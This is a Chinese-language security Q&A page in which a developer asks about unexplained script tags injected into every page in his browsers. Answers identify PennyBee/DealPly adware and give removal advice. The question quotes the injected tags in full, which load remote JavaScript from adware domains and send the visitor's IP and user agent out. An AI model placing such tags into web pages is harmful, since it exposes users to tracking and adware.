信息安全 - 我的浏览器中的这些 URL 是什么？ - 吾爱随笔录

我的浏览器中的这些 URL 是什么？

信息安全病毒

2021-08-22 20:51:45

我正在测试我的Node.JS应用程序。当我使用 Chrome 和 Mozilla 打开我的应用程序时，我看到这些 JS 文件包含在我浏览的每个页面中。它们出现在我使用的所有浏览器（Firefox、Chrome）中。

<script type="text/javascript" src="http://j.midnightjs.net/omeltest/common.js?appTitle=PennyBee&amp;channel=chkomel68&amp;hid=v460b5b79c-980c-e17f-cdcc-eaf6cd83c8d5"></script>
<script src="//q.pricejs.info/e?type=quick&amp;topic=suzan_commonjs&amp;partner=omeltest&amp;channel=chkomel68&amp;hid=v460b5b79c-980c-e17f-cdcc-eaf6cd83c8d5&amp;trinity=Z15e3d535a5k&amp;appTitle=PennyBee&amp;opdom=midnightjs.net&amp;instgrp=&amp;rnd=0.5035031025763601&amp;guid=" type="text/javascript"></script>
<script src="//h.midnightjs.net/e?type=heart_bit&amp;partner=omeltest&amp;channel=chkomel68&amp;hid=v460b5b79c-980c-e17f-cdcc-eaf6cd83c8d5&amp;trinity=Z15e3d535a5k&amp;appTitle=PennyBee&amp;opdom=midnightjs.net&amp;instgrp=&amp;sset=4&amp;cb=114_9_25&amp;src=midn8&amp;userAgent=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F38.0.2125.104%20Safari%2F537.36" type="text/javascript"></script>
<script src="http://i.omeljs.info/omeltest/javascript.js?channel=chkomel68&amp;hid=v460b5b79c-980c-e17f-cdcc-eaf6cd83c8d5&amp;instgrp=&amp;trinity=Z15e3d535a5k" type="text/javascript"></script> 
<script src="http://i.omeljs.info/opt_content.js?v=opt_1412683513880&amp;partner=omeltest&amp;channel=omeltestchkomel68&amp;sset=8&amp;appTitle=&amp;sset=8&amp;ip=5.47.69.10"></script>
<script src="http://c.omeljs.info/1507367.js?dn=10.6&amp;isc=0" type="text/javascript" id="__DealPly__222918.92021894455" class="dealply_content_script"></script>

我注意到这些链接正在将我的 IP 和其他数据发送到远程服务器。这是一种病毒，我该如何摆脱它？

4个回答

您的桌面似乎感染了 PennyBee（又名 DealPly、OfferBoulevard、SavingsBull）广告软件。

理论上，这通常可以通过使用添加/删除程序条目和 Chrome 和 Firefox 中的扩展程序/附加组件管理器来删除。但是，如果您在不知不觉中被此感染（可能：通过 IronSource/Injekt 运行的 InstallCore/OpenCandy/DownloadAdmin 捆绑程序，该组的一部分运行 PennyBee 等），谁知道还安装了什么？可能值得考虑全新安装。

这似乎是浏览器广告软件感染。这些广告软件的行为就像浏览器中的人一样，它们会在某些事件（例如鼠标单击）时被激活。一旦事件被触发，它们就会为任意网站产生流量。要摆脱这种情况，请考虑重新安装您的网络浏览器。要更仔细地查看，请尝试查看浏览器中安装的不同插件。如果您发现任何意外安装的可疑插件，请立即禁用它。但这不会是一个永久的解决方案。切换到在感染发生之前安装的其他浏览器也无济于事，因为这些程序通常会自行安装在机器上所有可用的浏览器上。

要查看此感染是否比您的浏览器安装范围更广，请创建一个新用户，浏览一些网站并查看新用户是否也被感染。在这种情况下，清理浏览器将无济于事。

我无法评论锁定到您的浏览会话的 JS 是否实际上是恶意的，但我可以提供一些建议，让您更好地控制您的 FireFox 浏览器呈现给潜在对手的攻击面。

如果您对 URI 的可信度（或者更确切地说是恶意意图）有任何疑问，请尝试在https://www.virustotal.com/之类的网站上查找它（对于提供类似服务的更多网站，请尝试谷歌搜索：“相关： www.virustotal.com”）。

另外，看到这是一个 JS 问题；您可以尝试为 FireFox 安装NoScript插件。这个插件让您可以控制允许哪些浏览器来源在您的浏览器中运行 JS 和其他活动内容。如果您担心被跟踪并将您的活动数据泄露到奇怪的未知网站，您可以尝试使用适用于 Firefox 的 Lightbeam 插件。

其它你可能感兴趣的问题

上一篇使用椭圆曲线 + 客户端证书认证时，Fiddler 可以解密 HTTPS 流量吗？下一篇用于验证 Web 应用程序的硬件令牌